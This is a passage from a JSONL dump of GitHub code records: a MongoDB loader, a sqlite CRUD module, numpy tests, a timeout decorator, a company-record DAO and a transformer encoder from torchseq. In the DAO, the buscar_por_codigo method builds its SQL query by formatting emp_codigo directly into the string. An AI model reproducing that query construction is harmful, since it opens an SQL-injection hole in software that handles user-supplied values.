214, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 214, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tick_params", "line_number": 215, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 215, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 216, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 216, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 218, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 218, "usage_type": "name"}, {"api_name": "mag.shock_date", "line_number": 218, "usage_type": "argument"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 219, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 219, "usage_type": "name"}, {"api_name": "mag.shock_date", "line_number": 219, "usage_type": "argument"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 241, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 241, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots_adjust", "line_number": 242, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 242, "usage_type": "name"}, {"api_name": "matplotlib.ticker.MultipleLocator", "line_number": 253, "usage_type": "call"}, {"api_name": "matplotlib.ticker", "line_number": 253, "usage_type": "name"}, {"api_name": "matplotlib.ticker.MultipleLocator", "line_number": 254, "usage_type": "call"}, {"api_name": "matplotlib.ticker", "line_number": 254, "usage_type": "name"}, {"api_name": "matplotlib.ticker.MultipleLocator", "line_number": 266, "usage_type": "call"}, {"api_name": "matplotlib.ticker", "line_number": 266, "usage_type": "name"}, {"api_name": "matplotlib.ticker.MultipleLocator", "line_number": 267, "usage_type": "call"}, {"api_name": "matplotlib.ticker", "line_number": 267, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 272, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 272, "usage_type": "name"}, {"api_name": "mag.shock_date", "line_number": 272, "usage_type": "argument"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 273, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 273, "usage_type": "name"}, {"api_name": "mag.shock_date", "line_number": 273, "usage_type": "argument"}, {"api_name": "numpy.empty", "line_number": 284, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 286, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 292, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 292, "usage_type": "call"}, {"api_name": "statistics.stdev", "line_number": 292, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 293, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 293, "usage_type": "call"}, {"api_name": "statistics.stdev", "line_number": 293, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 294, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 294, "usage_type": "call"}, {"api_name": "statistics.stdev", "line_number": 294, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 297, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 297, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 297, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 297, "usage_type": "attribute"}, {"api_name": "numpy.histogram", "line_number": 302, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 302, "usage_type": "call"}, {"api_name": "numpy.histogram", "line_number": 303, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 303, "usage_type": "call"}, {"api_name": "numpy.histogram", "line_number": 304, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 304, "usage_type": "call"}]} +{"seq_id": "12280789852", "text": "import pymongo\nimport json\n\n# Load JSON data\nwith open('courses.json', 'r') as f:\n data = json.load(f)\n\n# Connect to MongoDB\nclient = pymongo.MongoClient('localhost', 27017)\ndb = client['mydatabase']\ncollection = db['courses']\n\n# Create index\ncollection.create_index([('name', pymongo.ASCENDING)])\n\n# Insert data\nresult = collection.insert_many(data)\n\n# Print result\nprint(f\"{len(result.inserted_ids)} documents inserted.\")", "repo_name": "iamcvarma/KIMO-FastAPI-app", "sub_path": "data_loader.py", "file_name": "data_loader.py", "file_ext": "py", "file_size_in_byte": 426, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "json.load", "line_number": 6, "usage_type": "call"}, {"api_name": "pymongo.MongoClient", "line_number": 9, "usage_type": "call"}, {"api_name": "pymongo.ASCENDING", "line_number": 14, "usage_type": "attribute"}]} +{"seq_id": "5115657255", "text": "import sqlite3 as lite\n\n# Fazendo o CRUD\n\n# Criando a conexão\nconnection = lite.connect('dados.db')\n\n\n# Criando informações de clientes\ndef create_clients_info(clients_info_list):\n with connection:\n cursor_create_clients = connection.cursor()\n query_create_clients = \"INSERT INTO clientes (nome, CPF, email, telefone, endereço) VALUES (?, ?, ?, ?, ?)\"\n cursor_create_clients.execute(query_create_clients, clients_info_list)\n\n\n# Acessando informações de clientes\ndef show_clients_info():\n clients_list = []\n with connection:\n cursor_read_clients = connection.cursor()\n query_read_clients = \"SELECT * FROM clientes\"\n cursor_read_clients.execute(query_read_clients)\n info = cursor_read_clients.fetchall()\n\n for i in info:\n clients_list.append(i)\n return clients_list\n\n\n# Atualizando informações de clientes\ndef update_clients_info(clients_update_list):\n with connection:\n cursor_update_clients = connection.cursor()\n query_update_clients = \"UPDATE clientes SET nome=?, email=?, telefone=?, endereço=? WHERE cpf=?\"\n cursor_update_clients.execute(query_update_clients, clients_update_list)\n\n\n# Deletando clientes\ndef delete_clients_info(clients_delete_list):\n with connection:\n cursor_delete_clients = connection.cursor()\n query_delete_clients = \"DELETE FROM clientes WHERE cpf=?\"\n cursor_delete_clients.execute(query_delete_clients, clients_delete_list)\n\n\n####################################################################################################\n\n# Criando informações de motocicletas\ndef create_motorcycle_info(motorcycle_info_list):\n with connection:\n cursor_create_motorcycle = connection.cursor()\n query_create_motorcycle = \"INSERT INTO motocicletas (numero_de_identificaçao, preço, modelo, estado_da\" \\\n \"_motocicleta) VALUES (?, ?, ?, ?)\"\n cursor_create_motorcycle.execute(query_create_motorcycle, motorcycle_info_list)\n\n\n# Acessando informações de motocicletas\ndef show_motorcycle_info():\n motorcycle_list = []\n with connection:\n cursor_read_motorcycle = connection.cursor()\n query_read_motorcycle = \"SELECT * FROM motocicletas\"\n cursor_read_motorcycle.execute(query_read_motorcycle)\n info = cursor_read_motorcycle.fetchall()\n\n for i in info:\n motorcycle_list.append(i)\n return motorcycle_list\n\n\n# Atualizando informações de motocicletas\ndef update_motorcycle_info(motorcycle_update_list):\n with connection:\n cursor_update_motorcycle = connection.cursor()\n query_update_motorcycle = \"UPDATE motocicletas SET preço=?, modelo=?, estado_da_motocicleta=? WHERE numero_de\" \\\n \"_identificaçao=?\"\n cursor_update_motorcycle.execute(query_update_motorcycle, motorcycle_update_list)\n\n\n# Deletando motocicletas\ndef delete_motorcycle_info(motorcycle_delete_list):\n with connection:\n cursor_delete_motorcycle = connection.cursor()\n query_delete_motorcycle = \"DELETE FROM motocicletas WHERE numero_de_identificaçao=?\"\n cursor_delete_motorcycle.execute(query_delete_motorcycle, motorcycle_delete_list)\n", "repo_name": "PhellipeLisboa/Sistema-concessionaria", "sub_path": "view.py", "file_name": "view.py", "file_ext": "py", "file_size_in_byte": 3241, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "sqlite3.connect", "line_number": 6, "usage_type": "call"}]} +{"seq_id": "37769330535", "text": "import numpy as np\nimport unittest\n\nfrom data import getMode\n\n\nclass Tests(unittest.TestCase):\n def testGetModeSimple(self):\n oneHotEmotions = np.array([[1, 0], [0, 1]])\n\n classifierPred = [[1, 0]]\n predictions = np.array([classifierPred])\n\n mode = getMode(predictions, oneHotEmotions)\n self.assertTrue(np.array_equal(mode, classifierPred))\n\n def testGetModeComplex(self):\n oneHotEmotions = np.array([[1, 0], [0, 1]])\n\n pred1 = [[1, 0], [1, 0], [0, 1]]\n pred2 = [[1, 0], [0, 1], [0, 1]]\n pred3 = [[1, 0], [0, 1], [1, 0]]\n predictions = np.array([pred1, pred2, pred3])\n\n expected = [[1, 0], [0, 1], [0, 1]]\n\n mode = getMode(predictions, oneHotEmotions)\n self.assertTrue(np.array_equal(mode, expected))\n", "repo_name": "bonaert/mini-memoire", "sub_path": "src/tests.py", "file_name": "tests.py", "file_ext": "py", "file_size_in_byte": 798, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "unittest.TestCase", "line_number": 7, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 9, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 12, "usage_type": "call"}, {"api_name": "data.getMode", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.array_equal", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 23, "usage_type": "call"}, {"api_name": "data.getMode", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.array_equal", "line_number": 28, "usage_type": "call"}]} +{"seq_id": "18149145724", "text": "from functools import wraps\nimport signal\n\n__all__ = ['timeout']\n\n\nclass TimeoutError(Exception):\n \"\"\" A simple Exception based class as to allow users to catch timeout\n exceptions \"\"\"\n pass\n\n\ndef timeout(seconds):\n \"\"\" A decorator to provide timeouts of a function.\n\n Usage:\n @timeout(10)\n def foo():\n ....\n\n \"\"\"\n def decorator(func):\n \"\"\" Decorator method, wrapping the specified func \"\"\"\n def cb_sigalrm(signum, frame):\n \"\"\" signal callback handler, should always raise TimeoutError \"\"\"\n raise TimeoutError()\n\n def wrapper(*args, **kwargs):\n \"\"\" Actual timeout implementation, sets and unsets the alarm as\n needed \"\"\"\n orig_handler = signal.signal(signal.SIGALRM, cb_sigalrm)\n signal.alarm(seconds)\n try:\n result = func(*args, **kwargs)\n finally:\n signal.alarm(0)\n signal.signal(signal.SIGALRM, orig_handler)\n return result\n\n return wraps(func)(wrapper)\n\n return decorator\n", "repo_name": "CyberGrandChallenge/network-appliance", "sub_path": "tests/timeout.py", "file_name": "timeout.py", "file_ext": "py", "file_size_in_byte": 1093, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 10, "dataset": "github-code", "pt": "41", "api": [{"api_name": "signal.signal", "line_number": 31, "usage_type": "call"}, {"api_name": "signal.SIGALRM", "line_number": 31, "usage_type": "attribute"}, {"api_name": "signal.alarm", "line_number": 32, "usage_type": "call"}, {"api_name": "signal.alarm", "line_number": 36, "usage_type": "call"}, {"api_name": "signal.signal", "line_number": 37, "usage_type": "call"}, {"api_name": "signal.SIGALRM", "line_number": 37, "usage_type": "attribute"}, {"api_name": "functools.wraps", "line_number": 40, "usage_type": "call"}]} +{"seq_id": "40738735638", "text": "# coding: utf-8\n\"\"\"\nFecha de creacion 3/25/19\n@autor: mjapon\n\"\"\"\nimport copy\nimport logging\n\nfrom fusayal.logica.auditorias.taudit_dao import TAuditDao\nfrom fusayal.logica.contribuyente.contribuyente_dao import TContribuyenteDao\nfrom fusayal.logica.dao.base import BaseDao\nfrom fusayal.logica.empresa.empresa_model import TEmpresa\nfrom fusayal.logica.excepciones.validacion import ErrorValidacionExc\nfrom fusayal.logica.utils import enums, checkcambioutil\nfrom fusayal.utils import fechas, cadenas\n\nlog = logging.getLogger(__name__)\n\n\nclass TEmpresaDao(BaseDao):\n\n def get(self):\n sql = \"\"\"select emp_id, emp_ruc, emp_razonsocial, emp_nombrecomercial, \n emp_nroautorizacion, emp_fechaautorizacion from tempresa\"\"\"\n\n return self.first(sql=sql, tupla_desc=('emp_id', 'emp_ruc',\n 'emp_razonsocial', 'emp_nombrecomercial',\n 'emp_nroautorizacion', 'emp_fechaautorizacion'))\n\n def update(self, emp_codigo, form, user_edit):\n tempresa = self.dbsession.query(TEmpresa).filter(TEmpresa.emp_id == emp_codigo).first()\n\n if not cadenas.es_nonulo_novacio(form['emp_ruc']):\n raise ErrorValidacionExc(u\"Debe ingresar el ruc\")\n\n resvalid = TContribuyenteDao.verificar(form['emp_ruc'])\n if not resvalid:\n raise ErrorValidacionExc(u\"El número de ruc ingresado es incorrecto\")\n\n if not cadenas.es_nonulo_novacio(form['emp_razonsocial']):\n raise ErrorValidacionExc(u\"Debe ingresar la razon social\")\n\n # if not cadenas.es_nonulo_novacio(form['emp_nroautorizacion']):\n # raise ErrorValidacionExc(u\"Debe ingresar el número de autorización\")\n\n if not cadenas.es_nonulo_novacio(form['emp_fechaautorizacion']):\n raise ErrorValidacionExc(u\"Debe ingresar la fecha de autorización\")\n\n tempresa_cloned = copy.copy(tempresa)\n\n if tempresa is not None:\n tempresa.emp_ruc = form.get(\"emp_ruc\")\n tempresa.emp_razonsocial = form.get(\"emp_razonsocial\")\n tempresa.emp_nombrecomercial = form.get(\"emp_nombrecomercial\")\n tempresa.emp_fechaautorizacion = fechas.parse_cadena(form.get(\"emp_fechaautorizacion\"))\n # tempresa.emp_nroautorizacion = form.get(\"emp_nroautorizacion\")\n\n tauditdao = TAuditDao(self.dbsession)\n list_cambios = checkcambioutil.valor_cambiado(tempresa_cloned.__json__(), form)\n if list_cambios is not None and len(list_cambios) > 0:\n for row in list_cambios:\n col = row['col']\n valorant = row['valorant']\n valordesp = row['valordesp']\n tauditdao.crea_accion_update(enums.TBL_EMPRESA, col, user_edit, valorant, valordesp,\n tempresa.emp_id)\n\n def crear(self, form, user_crea):\n\n if not cadenas.es_nonulo_novacio(form['emp_ruc']):\n raise ErrorValidacionExc(u\"Debe ingresar el ruc\")\n\n # Validar que el ruc ingresado este correcto\n resvalid = TContribuyenteDao.verificar(form['emp_ruc'])\n if not resvalid:\n raise ErrorValidacionExc(u\"El número de ruc ingresado es incorrecto\")\n\n if not cadenas.es_nonulo_novacio(form['emp_razonsocial']):\n raise ErrorValidacionExc(u\"Debe ingresar la razon social\")\n\n if not cadenas.es_nonulo_novacio(form['emp_nroautorizacion']):\n raise ErrorValidacionExc(u\"Debe ingresar el número de autorización\")\n\n # Validar que el numero de autorizacion sea distinto de cero\n emp_nroautorizacion = form['emp_nroautorizacion']\n if not emp_nroautorizacion.isdigit():\n raise ErrorValidacionExc(u\"El número de autorización es incorrecto debe ser solo números\")\n elif int(emp_nroautorizacion) == 0:\n raise ErrorValidacionExc(u\"El número de autorización debe ser distinto de cero\")\n\n if not cadenas.es_nonulo_novacio(form['emp_fechaautorizacion']):\n raise ErrorValidacionExc(u\"Debe ingresar la fecha de autorización\")\n else:\n # Validar que no sean fechas posteriores a la fecha actual\n if not fechas.isvalid(form['emp_fechaautorizacion']):\n raise ErrorValidacionExc(\n \"La fecha de autorización ingresada es incorrecta verifique que se encuentre en el formato dd/mm/aaaa\")\n\n fecha_actual = fechas.get_str_fecha_actual()\n\n if not fechas.es_fecha_a_mayor_fecha_b(form['emp_fechaautorizacion'], fecha_actual):\n raise ErrorValidacionExc(u\"La fecha de autorización no puede estar despues de la fecha de actual\")\n\n tempresa = TEmpresa()\n tempresa.emp_ruc = form.get(\"emp_ruc\")\n tempresa.emp_razonsocial = form.get(\"emp_razonsocial\")\n tempresa.emp_nombrecomercial = form.get(\"emp_nombrecomercial\")\n tempresa.emp_fechaautorizacion = fechas.parse_cadena(form.get(\"emp_fechaautorizacion\"))\n tempresa.emp_nroautorizacion = form.get(\"emp_nroautorizacion\")\n self.dbsession.add(tempresa)\n self.dbsession.flush()\n\n tautditdao = TAuditDao(self.dbsession)\n tautditdao.crea_accion_insert(enums.TBL_EMPRESA, user_crea, tempresa.emp_id)\n\n def buscar_por_codigo(self, emp_codigo):\n\n sql = \"\"\"select emp_id, \n emp_ruc,\n emp_razonsocial,\n emp_nombrecomercial,\n emp_nroautorizacion,\n emp_fechaautorizacion,\n emp_esquema, \n emp_codigo, \n emp_menu from public.tempresa where emp_codigo = '{0}'\"\"\".format(emp_codigo)\n tupla_desc = ('emp_id',\n 'emp_ruc',\n 'emp_razonsocial',\n 'emp_nombrecomercial',\n 'emp_nroautorizacion',\n 'emp_fechaautorizacion',\n 'emp_esquema',\n 'emp_codigo',\n 'emp_menu')\n return self.first(sql, tupla_desc)\n", "repo_name": "mjapon/sysprintngjs", "sub_path": "fusayal/logica/empresa/empresa_dao.py", "file_name": "empresa_dao.py", "file_ext": "py", "file_size_in_byte": 6136, "program_lang": "python", "lang": "es", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "logging.getLogger", "line_number": 17, "usage_type": "call"}, {"api_name": "fusayal.logica.dao.base.BaseDao", "line_number": 20, "usage_type": "name"}, {"api_name": "fusayal.logica.empresa.empresa_model.TEmpresa", "line_number": 31, "usage_type": "argument"}, {"api_name": "fusayal.logica.empresa.empresa_model.TEmpresa.emp_id", "line_number": 31, "usage_type": "attribute"}, {"api_name": "fusayal.utils.cadenas.es_nonulo_novacio", "line_number": 33, "usage_type": "call"}, {"api_name": "fusayal.utils.cadenas", "line_number": 33, "usage_type": "name"}, {"api_name": "fusayal.logica.excepciones.validacion.ErrorValidacionExc", "line_number": 34, "usage_type": "call"}, {"api_name": "fusayal.logica.contribuyente.contribuyente_dao.TContribuyenteDao.verificar", "line_number": 36, "usage_type": "call"}, {"api_name": "fusayal.logica.contribuyente.contribuyente_dao.TContribuyenteDao", "line_number": 36, "usage_type": "name"}, {"api_name": "fusayal.logica.excepciones.validacion.ErrorValidacionExc", "line_number": 38, "usage_type": "call"}, {"api_name": "fusayal.utils.cadenas.es_nonulo_novacio", "line_number": 40, "usage_type": "call"}, {"api_name": "fusayal.utils.cadenas", "line_number": 40, "usage_type": "name"}, {"api_name": "fusayal.logica.excepciones.validacion.ErrorValidacionExc", "line_number": 41, "usage_type": "call"}, {"api_name": "fusayal.utils.cadenas.es_nonulo_novacio", "line_number": 46, "usage_type": "call"}, {"api_name": "fusayal.utils.cadenas", "line_number": 46, "usage_type": "name"}, {"api_name": "fusayal.logica.excepciones.validacion.ErrorValidacionExc", "line_number": 47, "usage_type": "call"}, {"api_name": "copy.copy", "line_number": 49, "usage_type": "call"}, {"api_name": "fusayal.utils.fechas.parse_cadena", "line_number": 55, "usage_type": "call"}, {"api_name": "fusayal.utils.fechas", "line_number": 55, "usage_type": "name"}, {"api_name": "fusayal.logica.auditorias.taudit_dao.TAuditDao", "line_number": 58, "usage_type": "call"}, {"api_name": "fusayal.logica.utils.checkcambioutil.valor_cambiado", "line_number": 59, "usage_type": "call"}, {"api_name": "fusayal.logica.utils.checkcambioutil", "line_number": 59, "usage_type": "name"}, {"api_name": "fusayal.logica.utils.enums.TBL_EMPRESA", "line_number": 65, "usage_type": "attribute"}, {"api_name": "fusayal.logica.utils.enums", "line_number": 65, "usage_type": "name"}, {"api_name": "fusayal.utils.cadenas.es_nonulo_novacio", "line_number": 70, "usage_type": "call"}, {"api_name": "fusayal.utils.cadenas", "line_number": 70, "usage_type": "name"}, {"api_name": "fusayal.logica.excepciones.validacion.ErrorValidacionExc", "line_number": 71, "usage_type": "call"}, {"api_name": "fusayal.logica.contribuyente.contribuyente_dao.TContribuyenteDao.verificar", "line_number": 74, "usage_type": "call"}, {"api_name": "fusayal.logica.contribuyente.contribuyente_dao.TContribuyenteDao", "line_number": 74, "usage_type": "name"}, {"api_name": "fusayal.logica.excepciones.validacion.ErrorValidacionExc", "line_number": 76, "usage_type": "call"}, {"api_name": "fusayal.utils.cadenas.es_nonulo_novacio", "line_number": 78, "usage_type": "call"}, {"api_name": "fusayal.utils.cadenas", "line_number": 78, "usage_type": "name"}, {"api_name": "fusayal.logica.excepciones.validacion.ErrorValidacionExc", "line_number": 79, "usage_type": "call"}, {"api_name": "fusayal.utils.cadenas.es_nonulo_novacio", "line_number": 81, "usage_type": "call"}, {"api_name": "fusayal.utils.cadenas", "line_number": 81, "usage_type": "name"}, {"api_name": "fusayal.logica.excepciones.validacion.ErrorValidacionExc", "line_number": 82, "usage_type": "call"}, {"api_name": "fusayal.logica.excepciones.validacion.ErrorValidacionExc", "line_number": 87, "usage_type": "call"}, {"api_name": "fusayal.logica.excepciones.validacion.ErrorValidacionExc", "line_number": 89, "usage_type": "call"}, {"api_name": "fusayal.utils.cadenas.es_nonulo_novacio", "line_number": 91, "usage_type": "call"}, {"api_name": "fusayal.utils.cadenas", "line_number": 91, "usage_type": "name"}, {"api_name": "fusayal.logica.excepciones.validacion.ErrorValidacionExc", "line_number": 92, "usage_type": "call"}, {"api_name": "fusayal.utils.fechas.isvalid", "line_number": 95, "usage_type": "call"}, {"api_name": "fusayal.utils.fechas", "line_number": 95, "usage_type": "name"}, {"api_name": "fusayal.logica.excepciones.validacion.ErrorValidacionExc", "line_number": 96, "usage_type": "call"}, {"api_name": "fusayal.utils.fechas.get_str_fecha_actual", "line_number": 99, "usage_type": "call"}, {"api_name": "fusayal.utils.fechas", "line_number": 99, "usage_type": "name"}, {"api_name": "fusayal.utils.fechas.es_fecha_a_mayor_fecha_b", "line_number": 101, "usage_type": "call"}, {"api_name": "fusayal.utils.fechas", "line_number": 101, "usage_type": "name"}, {"api_name": "fusayal.logica.excepciones.validacion.ErrorValidacionExc", "line_number": 102, "usage_type": "call"}, {"api_name": "fusayal.logica.empresa.empresa_model.TEmpresa", "line_number": 104, "usage_type": "call"}, {"api_name": "fusayal.utils.fechas.parse_cadena", "line_number": 108, "usage_type": "call"}, {"api_name": "fusayal.utils.fechas", "line_number": 108, "usage_type": "name"}, {"api_name": "fusayal.logica.auditorias.taudit_dao.TAuditDao", "line_number": 113, "usage_type": "call"}, {"api_name": "fusayal.logica.utils.enums.TBL_EMPRESA", "line_number": 114, "usage_type": "attribute"}, {"api_name": "fusayal.logica.utils.enums", "line_number": 114, "usage_type": "name"}]} +{"seq_id": "7436602889", "text": "from typing import Dict, Union, Tuple\nimport math\nimport logging\n\nimport torch\nimport torch.nn as nn\nfrom transformers import BartModel, BertModel, RobertaModel, MBartModel\n\nfrom torchseq.models.pooling import MultiHeadedPooling\nfrom torchseq.models.positional_embeddings import PositionalEncoding\nfrom torchseq.utils.tokenizer import Tokenizer\nfrom torchseq.utils.config import Config\nfrom torchseq.utils.functions import initialize_truncated_normal_, init_bert_params\n\nimport torchseq.models.transformer as custom_transformer\n\n\nclass SequenceEncoder(nn.Module):\n global_config: Config\n encoder_config: Config\n tokenizer: Tokenizer\n embeddings: nn.Embedding\n encoder: Union[custom_transformer.TransformerEncoder, nn.TransformerEncoder]\n\n def __init__(\n self,\n global_config: Config,\n encoder_config: Config,\n tokenizer: Tokenizer,\n embeddings=None,\n freeze_embeddings=False,\n ):\n super().__init__()\n self.global_config = global_config\n self.encoder_config = encoder_config\n self.tokenizer = tokenizer\n\n # Embedding layers\n if embeddings is not None:\n self.embeddings = embeddings\n self.embeddings.force_device = True # type: ignore # dynamic attr\n elif not encoder_config.get(\"bert_encoder\", False) and encoder_config.get(\"pretrained_encoder\", None) is None:\n self.embeddings = nn.Embedding(\n tokenizer.vocab_size,\n global_config.get_first([\"input_raw_embedding_dim\", \"raw_embedding_dim\"]),\n ).cpu()\n if self.tokenizer.has_embeddings and self.encoder_config.get(\"init_embeds_from_tokenizer\", True):\n self.embeddings.weight.data = self.tokenizer.get_embeddings()\n else:\n if self.encoder_config.get(\"init_embeds_like_bert\", False):\n init_bert_params(self.embeddings)\n else:\n torch.nn.init.xavier_uniform_(self.embeddings.weight.data, gain=1.0)\n # initialize_truncated_normal_(\n # self.embeddings.weight.data, std=1 / math.sqrt(config.decoder.embedding_dim)\n # )\n self.embeddings.weight.requires_grad = not freeze_embeddings\n self.embeddings.cpu()\n self.embeddings.force_device = True # type: ignore # dynamic attr\n\n if self.encoder_config.embedding_dim != global_config.get_first(\n [\"input_raw_embedding_dim\", \"raw_embedding_dim\"]\n ):\n self.embedding_projection = nn.utils.weight_norm(\n nn.Linear(\n global_config.get_first([\"input_raw_embedding_dim\", \"raw_embedding_dim\"]),\n encoder_config.embedding_dim,\n bias=False,\n )\n )\n\n # Encoder/decoders\n self.pretrained_model_slug = None\n if encoder_config.get(\"bert_encoder\", False) or encoder_config.get(\"pretrained_encoder\", None) is not None:\n self.pretrained_model_slug = (\n encoder_config.pretrained_encoder\n if encoder_config.get(\"pretrained_encoder\", None) is not None\n else encoder_config.bert_model\n )\n if \"mbart\" in self.pretrained_model_slug:\n bart_model = MBartModel.from_pretrained(self.pretrained_model_slug)\n self.pretrained_encoder = bart_model.encoder\n del bart_model.decoder\n elif \"bart\" in self.pretrained_model_slug:\n bart_model = BartModel.from_pretrained(self.pretrained_model_slug)\n self.pretrained_encoder = bart_model.encoder\n del bart_model.decoder\n elif \"roberta-\" in self.pretrained_model_slug:\n self.pretrained_encoder = RobertaModel.from_pretrained(self.pretrained_model_slug)\n else:\n # TODO: Make this an AutoModel?\n self.pretrained_encoder = BertModel.from_pretrained(self.pretrained_model_slug)\n\n if encoder_config.get(\"freeze_pretrained\", False):\n self.pretrained_encoder.requires_grad = False\n else:\n self.pretrained_encoder = None\n\n if self.encoder_config.get(\"residual\", False):\n self.encoder_projection = nn.utils.weight_norm(\n nn.Linear(encoder_config.embedding_dim * 2, encoder_config.embedding_dim, bias=False)\n )\n if self.encoder_config.get(\"pre_residual\", False):\n self.token_projection = nn.utils.weight_norm(\n nn.Linear(\n global_config.get_first([\"input_raw_embedding_dim\", \"raw_embedding_dim\"]),\n encoder_config.embedding_dim,\n bias=False,\n )\n )\n\n if self.encoder_config.data.get(\"pre_ln\", False):\n encoder_layer_custom = custom_transformer.TransformerEncoderLayer(\n encoder_config.embedding_dim\n + (0 if self.pretrained_model_slug is not None else global_config.bio_embedding_dim),\n nhead=encoder_config.num_heads,\n dim_feedforward=encoder_config.dim_feedforward,\n dropout=global_config.dropout,\n activation=encoder_config.activation,\n )\n encoder_norm = nn.LayerNorm(encoder_config.embedding_dim)\n self.encoder = custom_transformer.TransformerEncoder(\n encoder_layer_custom, encoder_config.num_layers, encoder_norm\n )\n else:\n encoder_layer = nn.TransformerEncoderLayer(\n encoder_config.embedding_dim,\n nhead=encoder_config.num_heads,\n dim_feedforward=encoder_config.dim_feedforward,\n dropout=global_config.dropout,\n activation=encoder_config.activation,\n batch_first=True,\n )\n encoder_norm = nn.LayerNorm(encoder_config.embedding_dim)\n self.encoder = nn.TransformerEncoder(\n encoder_layer, encoder_config.num_layers, encoder_norm, enable_nested_tensor=True\n )\n\n if self.encoder_config.get(\"init_like_bert\", False):\n init_bert_params(self.encoder)\n\n # Position encoding\n self.positional_embeddings = PositionalEncoding(encoder_config.embedding_dim)\n\n def forward(\n self,\n input_seq: torch.Tensor,\n input_seq_len: torch.Tensor,\n memory: Dict[str, torch.Tensor],\n include_position: bool = True,\n ) -> Tuple[torch.Tensor, Dict[str, torch.Tensor]]:\n max_input_len = input_seq.shape[1]\n device = input_seq.device\n\n # Set up some masks\n src_mask = torch.zeros(max_input_len, max_input_len, dtype=torch.bool).to(input_seq.device)\n # is_causal = False # ready for pt2\n\n if self.global_config.directional_masks:\n src_mask = src_mask.logical_not().triu_(diagonal=1)\n # is_causal = True\n\n if self.encoder_config.data.get(\"attention_limit\", None) is not None:\n raise Exception(\"attention_limit no longer supported!\")\n src_mask = torch.tril(src_mask, diagonal=self.encoder_config.data.get(\"attention_limit\", 0))\n\n if self.encoder_config.data.get(\"no_diagonal_attn\", False):\n raise Exception(\"no_diagonal_attn no longer supported!\")\n src_mask += -torch.inf * torch.eye(max_input_len)\n\n padding_mask = (torch.arange(max_input_len)[None, :].cpu() >= input_seq_len[:, None].cpu()).to(\n input_seq.device\n )\n\n memory[\"encoding_mask\"] = padding_mask\n\n if self.pretrained_encoder is None:\n input_toks_embedded = self.embeddings(input_seq.to(self.embeddings.weight.device)).to(device)\n\n if self.encoder_config.embedding_dim != self.global_config.get_first(\n [\"input_raw_embedding_dim\", \"raw_embedding_dim\"]\n ):\n input_toks_embedded = self.embedding_projection(input_toks_embedded)\n\n input_embedded = input_toks_embedded * math.sqrt(self.encoder_config.embedding_dim)\n\n memory[\"seq_embedded\"] = input_embedded.detach()\n\n if include_position:\n input_embedded = self.positional_embeddings(input_embedded)\n\n memory[\"seq_embedded_positioned\"] = input_embedded.detach()\n\n encoding = self.encoder(\n input_embedded,\n # is_causal=is_causal,\n # mask=(None if is_causal else src_mask),\n mask=src_mask,\n src_key_padding_mask=padding_mask,\n ).contiguous()\n\n else:\n # BERT expects a mask that's 1 unmasked, 0 for masked\n bert_padding_mask = (~padding_mask).long()\n\n bert_typeids: Dict = {}\n\n bert_encoding = self.pretrained_encoder(\n input_ids=input_seq.to(input_seq.device), attention_mask=bert_padding_mask, **bert_typeids\n )[0]\n\n if self.encoder_config.get(\"freeze_pretrained\", False):\n bert_encoding = bert_encoding.detach()\n\n if self.encoder_config.num_layers > 0:\n encoding = self.encoder(\n bert_encoding,\n # is_causal=is_causal,\n # mask=(None if is_causal else src_mask),\n mask=src_mask,\n src_key_padding_mask=padding_mask,\n ).contiguous()\n\n else:\n encoding = bert_encoding\n\n # Include original input?\n if self.encoder_config.get(\"residual\", False):\n encoding = self.encoder_projection(torch.cat([encoding, input_embedded], dim=-1))\n\n if self.encoder_config.get(\"pre_residual\", False):\n input_toks_resid = self.embeddings(input_seq.to(self.embeddings.weight.device)).to(input_seq.device)\n input_toks_resid = self.token_projection(input_toks_resid)\n input_toks_resid = self.positional_embeddings(input_toks_resid)\n encoding = torch.cat([encoding, input_toks_resid], dim=-1)\n\n return encoding, memory\n", "repo_name": "tomhosking/torchseq", "sub_path": "torchseq/models/encoder.py", "file_name": "encoder.py", "file_ext": "py", "file_size_in_byte": 10185, "program_lang": "python", 